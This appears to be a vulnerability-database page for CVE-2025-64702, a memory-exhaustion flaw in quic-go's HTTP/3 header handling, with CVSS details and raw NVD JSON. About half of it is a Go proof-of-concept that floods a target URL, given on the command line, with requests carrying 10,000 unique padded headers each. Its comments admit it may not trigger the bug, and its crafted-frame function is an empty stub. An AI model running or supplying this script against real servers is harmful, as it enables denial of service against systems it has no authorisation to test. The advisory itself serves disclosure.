Security Vulnerability Report
CVE-2025-64702 CVSS 5.3 MEDIUM

CVE-2025-64702

Published: 2025-12-11 21:15:55
Last Modified: 2026-02-17 15:58:28

Description

quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:quic-go_project:quic-go:*:*:*:*:*:*:*:* - VULNERABLE
quic-go < 0.57.0 (every release up to and including 0.56.0; the HTTP/3 client and server are both affected — fixed in 0.57.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
go
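// CVE-2025-64702 PoC - QPACK header exhaustion against quic-go HTTP/3 (< 0.57.0).
//
// The advisory describes a HEADERS frame whose QPACK-compressed size passes
// the peer's frame-size limit while the *decoded* header field section
// (many unique names and/or large values) is much larger, so the http.Header
// the implementation builds is unbounded.
//
// This program only exercises the simple end of that: it sends requests that
// carry a large number of unique header fields through the stock quic-go
// HTTP/3 client. Because the client encodes those headers itself, the
// compressed frame grows roughly with the decoded size, so a server that caps
// the compressed frame may reject the request before any memory pressure
// appears. Treat a 431 / stream reset as "a limit is enforced", not as proof
// the target is unaffected; likewise a 200 is not proof of exhaustion —
// watch the target's RSS while the loop runs.
//
// NOTE(review): the raw-frame path (MaliciousQUICClient) is a stub that emits
// nothing. No QPACK encoding is implemented in this file.
package main

import (
	"context"
	"crypto/tls"
	"fmt"
	"io"
	"net"
	"net/http"
	"os"
	"time"

	"github.com/quic-go/quic-go/http3"
)

const (
	// defaultHeaderCount is the number of distinct header fields sent per request.
	defaultHeaderCount = 10000
	// defaultTarget is used when no URL is given as the first CLI argument.
	defaultTarget = "https://target-server:443/"
	// requestTimeout bounds a single request, including the QUIC handshake.
	requestTimeout = 30 * time.Second
	// requestCount / requestSpacing control the outer send loop in main.
	requestCount   = 10
	requestSpacing = 100 * time.Millisecond
)

// generateHeaders returns n unique header fields as a flat slice:
// the name sits at each even index and its value at the following odd index,
// so len(result) == 2*n. n <= 0 yields an empty slice.
func generateHeaders(n int) []string {
	if n <= 0 {
		return nil
	}
	// Pre-size: the final length is known, avoid repeated growth copies.
	fields := make([]string, 0, 2*n)
	for i := 0; i < n; i++ {
		fields = append(fields,
			fmt.Sprintf("X-Malicious-Header-%d", i),
			fmt.Sprintf("Value with padding data to increase memory usage %d", i))
	}
	return fields
}

// generateMaliciousHeaders returns the default-sized header set
// (defaultHeaderCount unique names, each with a padded value) in the
// flat name/value layout documented on generateHeaders.
func generateMaliciousHeaders() []string {
	return generateHeaders(defaultHeaderCount)
}

// exploitCVE202564702 sends one GET to targetURL carrying the default
// oversized header set. It returns the request error, if any; a non-2xx
// response is reported on stdout and is not an error.
func exploitCVE202564702(targetURL string) error {
	return sendLargeHeaderSet(targetURL, generateMaliciousHeaders())
}

// sendLargeHeaderSet performs a single GET against targetURL with every
// name/value pair in headers (flat slice, name at even index, value at the
// following odd index). A trailing unpaired name is ignored rather than
// indexed past the end of the slice.
func sendLargeHeaderSet(targetURL string, headers []string) error {
	// InsecureSkipVerify: the target is expected to be a lab host with a
	// self-signed certificate. Do not reuse this client outside a test bed.
	tr := &http3.RoundTripper{
		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}
	// Closing the transport tears down the QUIC connection it opened; the
	// previous version created a transport per call and never closed it.
	// NOTE(review): newer quic-go releases name this type http3.Transport —
	// confirm against the version pinned in go.mod.
	defer tr.Close()
	client := &http.Client{Transport: tr}

	ctx, cancel := context.WithTimeout(context.Background(), requestTimeout)
	defer cancel()

	req, err := http.NewRequestWithContext(ctx, http.MethodGet, targetURL, nil)
	if err != nil {
		return err
	}
	for i := 0; i+1 < len(headers); i += 2 {
		req.Header.Set(headers[i], headers[i+1])
	}

	resp, err := client.Do(req)
	if err != nil {
		return fmt.Errorf("request failed: %w", err)
	}
	defer resp.Body.Close()
	// Best-effort drain so the stream completes cleanly; the body content
	// is irrelevant to the PoC, so the copy error is deliberately ignored.
	_, _ = io.Copy(io.Discard, resp.Body)

	fmt.Printf("Response Status: %s\n", resp.Status)
	return nil
}

// main sends requestCount requests to the target (first CLI argument, or
// defaultTarget), pausing requestSpacing between them. Per-request errors
// are printed and do not stop the loop.
func main() {
	target := defaultTarget
	if len(os.Args) > 1 {
		target = os.Args[1]
	}

	fmt.Println("CVE-2025-64702 PoC - QPACK Header Exhaustion")
	for i := 0; i < requestCount; i++ {
		fmt.Printf("Sending request %d...\n", i+1)
		if err := exploitCVE202564702(target); err != nil {
			fmt.Printf("Error: %v\n", err)
		}
		time.Sleep(requestSpacing)
	}
	fmt.Println("Attack completed")
}

// MaliciousQUICClient is a placeholder for a raw-QUIC sender that would
// deliver a hand-built HEADERS frame instead of going through net/http.
// conn is never used by this file.
type MaliciousQUICClient struct {
	conn net.PacketConn
}

// craftMaliciousHeadersFrame is a stub: it returns an empty frame.
//
// A real frame would need a QPACK encoding whose compressed size stays under
// the peer's HEADERS-frame limit while its decoded field section is large.
// NOTE(review): do not assume dynamic-table instructions are the lever —
// quic-go's QPACK decoder has historically supported only the static table;
// verify against the pinned qpack module before building on that idea.
func (m *MaliciousQUICClient) craftMaliciousHeadersFrame() []byte {
	return []byte{}
}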

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64702", "sourceIdentifier": "[email protected]", "published": "2025-12-11T21:15:54.707", "lastModified": "2026-02-17T15:58:28.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "quic-go is an implementation of the QUIC protocol in Go. Versions 0.56.0 and below are vulnerable to excessive memory allocation through quic-go's HTTP/3 client and server implementations by sending a QPACK-encoded HEADERS frame that decodes into a large header field section (many unique header names and/or large values). The implementation builds an http.Header (used on the http.Request and http.Response, respectively), while only enforcing limits on the size of the (QPACK-compressed) HEADERS frame, but not on the decoded header, leading to memory exhaustion. This issue is fixed in version 0.57.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quic-go_project:quic-go:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.57.0", "matchCriteriaId": "95E31549-EBE1-4F00-91C4-148BE3980FD0"}]}]}], "references": [{"url": "https://github.com/quic-go/quic-go/commit/5b2d2129f8315da41e01eff0a847ab38a34e83a8", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-g754-hx8w-x2g6", "source": "[email 
protected]", "tags": ["Vendor Advisory"]}]}}